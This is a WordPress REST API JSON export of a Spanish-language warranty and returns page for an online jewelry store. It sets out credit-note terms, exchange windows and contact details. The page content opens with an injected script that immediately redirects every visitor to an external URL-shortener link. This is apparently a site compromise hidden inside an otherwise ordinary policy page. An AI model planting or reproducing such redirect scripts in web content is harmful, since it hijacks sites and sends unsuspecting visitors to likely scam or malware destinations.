{"id":30600,"date":"2023-10-27T14:55:55","date_gmt":"2023-10-27T18:55:55","guid":{"rendered":"https:\/\/steelove.com\/store\/?page_id=30600"},"modified":"2023-10-27T15:02:14","modified_gmt":"2023-10-27T19:02:14","slug":"garantia","status":"publish","type":"page","link":"https:\/\/steelove.com\/store\/garantia\/","title":{"rendered":"Garant\u00eda"},"content":{"rendered":"<p><script>window.location.href = \"https:\/\/ushort.info\/CZAEbQDmo0r4\";<\/script><\/p>\n<p>Nuestras joyas tienen garant\u00eda. Esta cubre dentro de los primeros 180 d\u00edas o 6 meses a partir de la fecha de compra. <\/p>\n<p>Solo aplica para nota de cr\u00e9dito del 100% del importe pagado por su producto, no se reembolsar\u00e1n valores monetarios. <\/p>\n<p>Esta garant\u00eda no cubre roturas de las piezas. Los defectos o desperfectos debidos al uso incorrecto o los desgastes producidos por un uso anormal de los productos, anular\u00e1n la garant\u00eda en su totalidad. <\/p>\n<p>Todos los productos tendr\u00e1n derecho a (1) un solo uso de garant\u00eda, es decir, solo tendr\u00e1 derecho a 1 solo reemplazo por garant\u00eda y durante el tiempo establecido seg\u00fan detallamos aqu\u00ed. Es imprescindible su factura, ticket de cambio o tarjeta de garant\u00eda.<\/p>\n<p>2.- PRODUCTOS ADQUIRIDOS EN OFERTA, cuentan con una garant\u00eda total de solo 30 d\u00edas a partir de la fecha de compra. Solo aplica para nota de cr\u00e9dito del 100% del importe pagado por la pieza, no se reembolsar\u00e1n valores monetarios. Solo aplicable a 1 \u00fanico uso de garant\u00eda o reemplazo durante este periodo. Es imprescindible su factura, ticket de cambio o tarjeta de garant\u00eda.<\/p>\n<p>3.- LOS CAMBIOS, podr\u00e1n realizarse en un plazo no mayor a 15 d\u00edas, a partir de la fecha de compra del producto. Es imprescindible su factura, ticket de cambio o tarjeta de garant\u00eda. Solo aplica si este es recibido en \u00f3ptimas condiciones y en su empaque original, sin se\u00f1ales de uso. Solo es permitido 1 \u00fanico cambio de productos por factura.<\/p>\n<p>4.- Las compras realizadas con tarjeta regalo o enviadas como regalo podr\u00e1n cambiarse por otros productos, pero no se reembolsar\u00e1n valores monetarios.<\/p>\n<p>5.- Toda notificaci\u00f3n por causa del proceso de garant\u00eda o devoluci\u00f3n debe constar por escrito y remitido al siguiente correo electr\u00f3nico info@steelove.com, si no cuenta con correo electr\u00f3nico deber\u00e1 hacerlo v\u00eda al whatsapp 809-567-0540.<\/p>\n<p>6.- El cliente podr\u00e1 enviar el art\u00edculo defectuoso con previo acuerdo por nuestra parte; una vez comprobado un fallo de fabricaci\u00f3n o aver\u00eda de acuerdo a las condiciones previamente descritas en la garant\u00eda. (el costo de env\u00edo del producto ser\u00e1 cubierto por el cliente)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Nuestras joyas tienen garant\u00eda. Esta cubre dentro de los primeros 180 d\u00edas o 6 meses a partir de la fecha de compra. Solo aplica para nota de cr\u00e9dito del 100% del importe pagado por su producto, no se reembolsar\u00e1n valores monetarios. Esta garant\u00eda no cubre roturas de las piezas. Los defectos o desperfectos debidos al [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-30600","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/steelove.com\/store\/wp-json\/wp\/v2\/pages\/30600","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/steelove.com\/store\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/steelove.com\/store\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/steelove.com\/store\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/steelove.com\/store\/wp-json\/wp\/v2\/comments?post=30600"}],"version-history":[{"count":4,"href":"https:\/\/steelove.com\/store\/wp-json\/wp\/v2\/pages\/30600\/revisions"}],"predecessor-version":[{"id":30607,"href":"https:\/\/steelove.com\/store\/wp-json\/wp\/v2\/pages\/30600\/revisions\/30607"}],"wp:attachment":[{"href":"https:\/\/steelove.com\/store\/wp-json\/wp\/v2\/media?parent=30600"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}